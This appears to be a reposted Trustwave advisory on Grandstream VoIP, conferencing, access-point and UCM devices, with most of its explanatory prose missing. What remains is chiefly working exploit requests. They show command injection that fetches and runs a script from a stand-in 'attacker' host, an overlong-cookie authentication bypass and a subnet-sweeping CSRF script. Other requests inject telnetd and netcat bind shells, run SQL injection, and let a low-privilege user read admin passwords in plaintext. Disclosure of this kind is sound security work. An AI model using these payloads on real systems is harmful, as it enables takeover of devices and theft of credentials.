Professional Documents
Culture Documents
GrandstreamExploitsثغرات
GrandstreamExploitsثغرات
Published: 04/05/2019
Version: 3.0
Vendor: Grandstream (http://www.grandstream.com/)
Product: Audio/Video/Voip/Routers/Security Cameras
Version affected:
Pre-auth RCE:
GAC2500 -- F/W version: 1.0.3.35
GVC3202 -- F/W version: 1.0.3.51
GXP2200 -- F/W version: 1.0.3.27 (end of life product)
GXV3275 -- F/W version: 1.0.3.210
GXV3240 -- F/W version: 1.0.3.210
Product description:
Various networking and communication solutions.
Request:
===========================
GET /manager?
action=getlogcat®ion=maintenance&tag=&priority=;reboot;&time=1543915668008
HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat
When entering an invalid phonecookie value, the server correctly denies access
to the the API endpoints:
Request:
===========================
GET /manager?action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://
attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/
x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat
Response:
===========================
HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49
Connection: close
Date: Tue, 04 Dec 2018 09:29:11 GMT
Server: IP Video Conferencing
Response=Error
Message=Authentication Required
Request:
===========================
GET /manager?action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://
attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/
x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en;
phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900;
tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51;
logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat
--------------------
--------------------
The following proof of concept shows how a malicious HTML page could be used to try
and CSRF this:
<script>
for (var i = 0; i < 254; i++) {
(function(i){
var oReq = new XMLHttpRequest();
oReq.open("GET", "http://10.0.0."+i+"/manager?
action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/
data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543909525160 ");
oReq.setRequestHeader("Accept","phonecookie=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";");
oReq.send();
})(i);
}
</script>
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 179
Connection: close
Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin
{"jsonrpc":"2.0","id":127,"method":"call","params":
["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
/ # id
uid=0(root) gid=0(root)
/ #
This area of functionality is only visible via the UI as admin, however the
'user' account is able to still hit this API endpoint. Additionally, it's
possible for the 'user' account to retrieve the password in plaintext for the
admin user (as well as the rest of the device settings) by the following
request. The user can then simply just login as admin.
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 123
Connection: close
Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user
{"jsonrpc":"2.0","id":7,"method":"call","params":
["c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 9574
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change
_required":"1","ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":
"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM
9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L
Vd@>.Wf8]V\\
N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web
_port":"443"
[...]
Grandstream's GWN7610 (Wireless Access Point) firmware version 1.0.8.9 and prior
is vulnerable to remote code execution by exploiting a post auth command
injection vulnerability.
Request:
===========================
POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 177
Connection: close
Cookie: userid=817309838e44d88e62534d563598e60a; user=admin
{"jsonrpc":"2.0","id":127,"method":"call","params":
["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
Request:
===========================
POST /ubus/uci.get HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Length: 123
Connection: close
Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user
{"jsonrpc":"2.0","id":7,"method":"call","params":
["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 3973
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
syslog_uri":"10.0.0.125","log_level":"7"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","country":"840","applied_patch":"1","
admin_password":"Password1","user_password":"Password1","pairing_key"
[...]
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/
x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.74
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
------------------------------
Request:
===========================
GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-
p5555&loglevel=0 HTTP/1.1
Host: 10.0.0.135
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.135/Pages/syslog.html
cache-control: no-cache
context-type: text/xml;charset=utf-8
Content-Type: application/x-www-form-encodeURIComponent
If-Modified-Since: 0
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
----------------------------
----------------------------
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-
1543933269; username=admin; user_id=0
action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0
action=backupUCMConfig&file-backup=backup_20181129_224405;x=$'busybox\x20nc\x20-l\
x20-p\x201337\x20-e\x20sh';$x;.tar;+realtime
------------------------------
------------------------------
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot
noot",sqlite_version(),null;--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 258
Connection: close
Date: Tue, 04 Dec 2018 14:40:26 GMT
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null
FROM sqlite_master--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 46541
Connection: close
Date: Tue, 04 Dec 2018 14:44:04 GMT
{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",
"members": "1001", "tmp": "2" }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "language_settings", "tmp": null }, { "extension": null, "group_name":
null, "members": "sqlite_sequence", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp_settings", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp6_settings", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
{ "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp":
null }, { "extension": null, "group_name": null, "members":
"typical_firewallsettings", "tmp": null }, { "extension": null, "group_name": null,
"members": "static_defense", "tmp": null }, { "extension": null, "group_name":
null, "members": "static_defense", "tmp": null }, { "extension": null,
"group_name": null, "members": "static_defense", "tmp": null }, { "extension":
null, "group_name": null, "members": "blacklist", "tmp": null }
[...]
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/
x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.84
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
------------------------------
Remediation Steps:
Ensure all devices are up-to-date and running the latest firmware; turn on
automatic updates; change all default credentials on the devices for all accounts;
run the devices on a separate network from those accessing sensitive information;
disabling access to all services that aren�t required on the device; and upgrading
any end-of-life devices that are no longer receiving security updates.
The firmware versions that were released to address these findings include:
Please note that Trustwave has not verified all the vendor supplied fixes.
Revision History:
12/06/2018 : Vulnerabilities disclosed to vendor
02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202
03/01/2019 : Vendor announces firmware updates available for GWN7000
03/22/2019 : Advisory 1.0 published
03/27/2019 : Advisory 2.0 published
04/05/2019 : Advisory 3.0 published
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.